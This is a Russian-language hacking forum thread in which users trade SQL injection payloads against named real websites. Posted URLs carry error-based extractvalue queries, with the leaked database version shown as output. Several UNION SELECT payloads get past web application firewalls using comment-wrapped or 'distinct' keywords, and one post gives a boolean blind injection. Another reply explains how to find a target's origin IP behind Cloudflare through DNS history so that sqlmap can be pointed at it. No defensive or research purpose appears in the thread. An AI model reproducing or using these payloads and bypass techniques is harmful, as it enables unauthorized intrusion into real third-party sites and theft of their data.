02.04.2021, 19:47
|
|
Новичок
Регистрация: 19.07.2020
Сообщений: 6
С нами:
3063926
Репутация:
1
|
|
Сообщение от joelblack
↑
Error-Based например:
Код:
http://www.royalporcelain.co.th/agent-download.php?code=-1%27/**_**/AND/**_**/extractvalue(1,concat(0x3a,(select/**_**/@@version)))+--+-
Код:
XPATH syntax error: ':5.5.65-MariaDB'
Agent Code Is Invalid
Огромное спасибо!
|
|
|
03.04.2021, 09:17
|
|
Участник форума
Регистрация: 30.12.2016
Сообщений: 218
С нами:
4931606
Репутация:
138
|
|
Сообщение от WallHack
↑
Спасибо за ответ!
Но Null байт уже чекал, из 60-ти сайтов на двух древних сработало
Кстати чекал и на более ранних версиях, в том числе PHP/5.3.3 на ней тоже не сработало почему-то
Фикс был внутри версии 5.3.3, в 5.3.3.7 еще работал, в 5.3.3.8 уже нет.
|
|
|
|
08.04.2021, 08:56
|
|
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
С нами:
5344886
Репутация:
441
|
|
Сообщение от Samozvanec
↑
Понимаю, что уже наверное достал постить в этой ветке что-то однотипное
Всё в порядке. Тема как раз создавалась для подобных однотипных вопросов, а ваше упорство в попытках постигнуть истинную суть инъекций заслуживает похвалы. Текущее поколение кулхацкеров, скульмаперов и метасплоитеров, тоска жуткая
Сообщение от Samozvanec
↑
но вот проблема, третий день бьюсь и не могу шагнуть дальше количества колонок. И не понятно, Blind это или нет. Функции Case, Substr, Mid и оператор like, в том числе и ASCII результата не принесли (по крайней мере в моих кривых рученках).
Иногда полезно какое-то время уделить разработке. С оптытом, придёт понимание абстрактных внутренних процессов и можно будет с большой вероятностью предположить, в какой части логики находится уязвимость и какого рода она может быть. Сходу, смею вангануть, что инъекция находится в запросе выборки категории, по ID которой в дальнейшем будут выбираться позиции для листинга. Следовательно, если нет вывода ошибок, с большой вероятностью можем предположить лишь булевой вариант. Простейшим выходом в данном случае, будет считывание текущего запроса из INFORMATION_SCHEMA.PROCESSLIST вслепую, чтоб точно подтверить/опровергнуть теорию.
На правах старорега, хотелось бы добавить, что лично я, вообще не поддерживаю раскрутки подобных уязвимостей на чужих площадках публично, дебилов в наше время хватает, поверьте. Но дело каждого, на свой страх и риск как говорится. По поводу же РУ/СНГ ресурсов, вообще есть негласное правило, что их следует стараться обходить стороной, по многим причинам, которые заслуживают отдельного обсуждения, а скорее всего холивара Поэтому, настоятельно рекомедую переварить и принять к сведению полученную информацию. Чтоб закрыть вопрос с этим кейсом, взглянул одним глазком, имеет место неопределённое поведение, но инъекции нет.
|
|
|
|
16.04.2021, 10:54
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами:
9650336
Репутация:
662
|
|
Помогите ваф обойти, фильтрует юнион селект
Код:
http://www.ipcinfo.org/ipc-country-analysis/details-map/en/c/459550+uion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93+--+/?iso3=AFG%27
|
|
|
|
16.04.2021, 12:36
|
|
Постоянный
Регистрация: 18.07.2013
Сообщений: 300
С нами:
6747446
Репутация:
32
|
|
Сообщение от DezMond™
↑
Помогите ваф обойти, фильтрует юнион селект
Код:
http://www.ipcinfo.org/ipc-country-analysis/details-map/en/c/459550+union+distinct+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93+--+/?iso3=AFG%27
|
|
|
|
29.05.2021, 10:32
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами:
9650336
Репутация:
662
|
|
Не пойму вафа нету, скуля слепая, но скулмап не раскручивает( в чем трабла?
Код:
https://www.akbw.de/nc/veranstaltungen/veranstaltungskalender-architekturtreff.html?no_cache=1&tx_fufevents_pi1%5Bsearch%5D%5Borganizer%5D=35110
|
|
|
|
01.06.2021, 19:04
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами:
9650336
Репутация:
662
|
|
Помогите ваф обойти, фильтрует и юнион и селект
Код:
https://www.baslerhofmann.ch/index.php?id=2649&L=3&tx_cabagjobs_pi1%5BjobUid%5D=914+/*!12345uNIoN*/++/*!12345sELecT*/+1,2,3,4,5+--+
|
|
|
|
01.06.2021, 23:03
|
|
Участник форума
Регистрация: 06.07.2015
Сообщений: 240
С нами:
5713526
Репутация:
145
|
|
Сообщение от DezMond™
↑
Помогите ваф обойти, фильтрует и юнион и селект
Код:
https://www.baslerhofmann.ch/index.php?id=2649&L=3&tx_cabagjobs_pi1%5BjobUid%5D=914+/*!12345uNIoN*/++/*!12345sELecT*/+1,2,3,4,5+--+
Код:
914+||+(select mid(@@version,1,1)=5)+--+-
|
|
|
|
02.06.2021, 19:29
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от DezMond™
↑
Помогите ваф обойти, фильтрует и юнион и селект
Код:
https://www.baslerhofmann.ch/index.php?id=2649&L=3&tx_cabagjobs_pi1%5BjobUid%5D=914+/*!12345uNIoN*/++/*!12345sELecT*/+1,2,3,4,5+--+
Тут надо клоуд обходить, смотрим ип через DNS history:
____viewdns.info/iphistory/?domain=baslerhofmann.ch
Там будет такая запись:
Сообщение от None
5.148.171.143
Switzerland Nine Internet Solutions AG, Switzerland 2020-12-21
Далее просто направляем скульмап и радуемся жизни:
Итого, что мы имеем:
|
|
|
|
24.06.2021, 15:50
|
|
Новичок
Регистрация: 23.09.2019
Сообщений: 15
С нами:
3495926
Репутация:
0
|
|
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
